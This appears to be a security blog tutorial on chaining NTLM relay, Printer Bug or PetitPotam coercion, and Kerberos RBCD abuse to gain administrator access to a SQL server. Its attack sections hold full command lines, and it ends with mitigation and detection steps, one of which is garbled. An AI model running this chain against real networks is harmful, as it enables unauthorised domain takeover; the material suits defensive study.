The Kerberos RBCD Relay: How a Single Coerced Authentication Can Compromise Your Domain

Listen to this Post

Featured Image

Introduction:

A sophisticated attack chain combining NTLM Relay and Kerberos Resource-Based Constrained Delegation (RBCD) poses a significant threat to enterprise networks. This technique allows attackers to compromise high-value servers by relaying coerced authentication and manipulating delegation privileges, all without requiring credential theft.

Learning Objectives:

  • Understand the mechanics of NTLM relay attacks against LDAPS
  • Learn how to exploit the Printer Bug for authentication coercion
  • Master Kerberos RBCD configuration for privilege escalation

You Should Know:

1. Initial Attack Setup: Poisoning and Relay Services

This phase establishes the attacker’s listening services to capture and relay authentication attempts.

Verified Commands:

 Start Responder for LLMNR/NBT-NS poisoning
sudo responder -I eth0 -dwv

Start ntlmrelayx.py for LDAPS relay with RBCD attack
ntlmrelayx.py -t ldaps://dc01.corp.local --delegate-access --rbcd-attack -wh attacker-wpad

Step-by-Step Guide:

Responder listens on the specified interface (eth0) for NetBIOS, LLMNR, and mDNS queries, responding with the attacker’s IP to poison name resolution. The `-dwv` flags enable DHCP, WPAD, and verbose logging. Simultaneously, `ntlmrelayx.py` establishes a relay server that forwards captured NTLM authentication to the domain controller’s LDAPS service. The `–delegate-access` and `–rbcd-attack` flags automate the RBCD exploitation process once authentication is relayed.

  1. Authentication Coercion: Forcing the SQL Server to Authenticate
    Force a machine account to authenticate to the attacker-controlled relay using the Printer Bug or similar coercion techniques.

Verified Commands:

 Coerce authentication using SpoolSample tool
SpoolSample.exe SQL01.corp.local ATTACKER_IP

Alternative using PetitPotam
python3 PetitPotam.py -d corp.local -u user -p password ATTACKER_IP SQL01.corp.local

Step-by-Step Guide:

The SpoolSample tool exploits the Print Spooler service vulnerability by requesting the SQL server to connect to the attacker’s machine. When SQL01 attempts to connect, it performs NTLM authentication that gets captured by the relay service. The `SpoolSample.exe` takes the target server name and attacker IP as parameters, forcing the target to authenticate against the attacker’s listener.

3. RBCD Attack Automation: Weaponizing Relayed Authentication

The relayed LDAPS session configures RBCD to grant compromise capabilities.

Verified Commands:

 ntlmrelayx automatically performs these steps during --rbcd-attack:
 1. Creates a new computer account (if not existing)
 2. Sets msDS-AllowedToActOnBehalfOfOtherIdentity on target
 3. Grants the new account delegation rights

Manual verification of RBCD settings
PowerShell: Get-ADComputer SQL01 -Properties msDS-AllowedToActOnBehalfOfOtherIdentity

Step-by-Step Guide:

Upon successful relay, `ntlmrelayx.py` automatically creates a new computer account (like FAKEMACHINE$) if one doesn’t exist, then modifies the target computer’s `msDS-AllowedToActOnBehalfOfOtherIdentity` attribute to grant this new account delegation privileges. This allows the attacker to impersonate any user to the SQL server service.

4. Kerberos Ticket Acquisition: S4U2Proxy Exploitation

Leverage the configured RBCD to obtain service tickets for privileged access.

Verified Commands:

 Get a TGT for the fake computer account
getTGT.py -dc-ip dc01.corp.local CORP.LOCAL/FAKEMACHINE\$:Password123

Perform S4U2Proxy to get service ticket for SQL service
getST.py -dc-ip dc01.corp.local -spn MSSQLSvc/SQL01.corp.local:1433 -impersonate administrator -altservice cifs/SQL01.corp.local 'CORP.LOCAL/FAKEMACHINE$:Password123'

Step-by-Step Guide:

After setting up RBCD, use `getTGT.py` to obtain a Ticket Granting Ticket for the compromised computer account. Then `getST.py` performs the Service-for-User-to-Proxy (S4U2proxy) extension, requesting a service ticket for the SQL service while impersonating the administrator account. The `-altservice` flag can request tickets for other services like CIFS for file share access.

5. Lateral Movement: Utilizing the Service Ticket

Use the acquired Kerberos ticket to access the target service with elevated privileges.

Verified Commands:

 Set the Kerberos ticket for use
export KRB5CCNAME=administrator.ccache

Connect to SQL Server using the ticket
python3 mssqlclient.py -k SQL01.corp.local -no-pass

Alternative for SMB access
smbclient.py -k -no-pass //SQL01.corp.local/C$

Step-by-Step Guide:

The `KRB5CCNAME` environment variable tells Kerberos tools to use the cached ticket. `mssqlclient.py` with `-k` flag uses Kerberos authentication without requiring a password, establishing a database connection as the impersonated administrator. Similarly, `smbclient.py` can access file shares using the same authentication method.

6. Mitigation: Preventing NTLM Relay Attacks

Implement defensive measures to break the attack chain.

Verified Commands:

 Disable LLMNR via GPO
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient" /v EnableMulticast /t REG_DWORD /d 0 /f

Disable NTLM authentication where possible
 Enable SMB signing
reg add "HKLM\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters" /v requiresecuritysignature /t REG_DWORD /d 1 /f

Step-by-Step Guide:

Disabling LLMNR through Group Policy or registry modification prevents name resolution poisoning. Enabling SMB signing (registry value requiresecuritysignature) ensures SMB communications are signed, making them unsuitable for relay. Additionally, disabling NTLM in favor of Kerberos and implementing EPA (Extended Protection for Authentication) for LDAPS prevents credential relay.

7. Detection: Identifying RBCD Attacks

Monitor for suspicious RBCD modifications and computer account creation.

Verified Commands:

 PowerShell script to monitor RBCD changes
Get-ADComputer -Filter  -Properties msDS-AllowedToActOnBehalfOfOtherIdentity | Where-Object {$_.'msDS-AllowedToActOnBehalfOfOtherIdentity'}

Detect new computer account creation
Get-ADComputer -Filter {Created -gt (Get-Date).AddDays(-1)} -Properties Created,OperatingSystem

Step-by-Step Guide:

Regularly audit RBCD configurations using PowerShell to identify computers with delegation permissions. Monitor Event ID 4741 for computer account creation and Event ID 4735 for security descriptor modifications in Windows Security logs. Implement alerts for unexpected RBCD changes, particularly those involving recently created computer accounts.

What Undercode Say:

  • This attack demonstrates that even without credential theft, relayed authentication can lead to full domain compromise through privilege escalation.
  • The combination of legacy protocol weaknesses and Kerberos delegation features creates a perfect storm for lateral movement.

The Kerberos RBCD relay attack represents a critical evolution in lateral movement techniques, leveraging built-in Windows features rather than software vulnerabilities. What makes this particularly dangerous is its reliance on legitimate functionality—NTLM authentication, LDAPS communications, and Kerberos delegation—making detection through traditional signature-based methods challenging. Organizations must prioritize architectural defenses including disabling unnecessary protocols, implementing comprehensive monitoring for delegation changes, and migrating entirely to Kerberos authentication where possible. The attack’s success hinges on the continued presence of NTLM in enterprise environments, underscoring the urgent need for complete NTLM deprecation.

Prediction:

As Microsoft continues to harden Kerberos and NTLM protocols, attackers will shift toward manipulating cloud-based identity systems and application delegation models. Similar RBCD-style attacks will emerge targeting Azure AD Connect, hybrid identity configurations, and service principal delegations in cloud environments. The underlying pattern of abusing legitimate delegation mechanisms will persist, requiring continuous monitoring of identity configuration changes across both on-premises and cloud infrastructures.

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Jason Ampoloquio – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky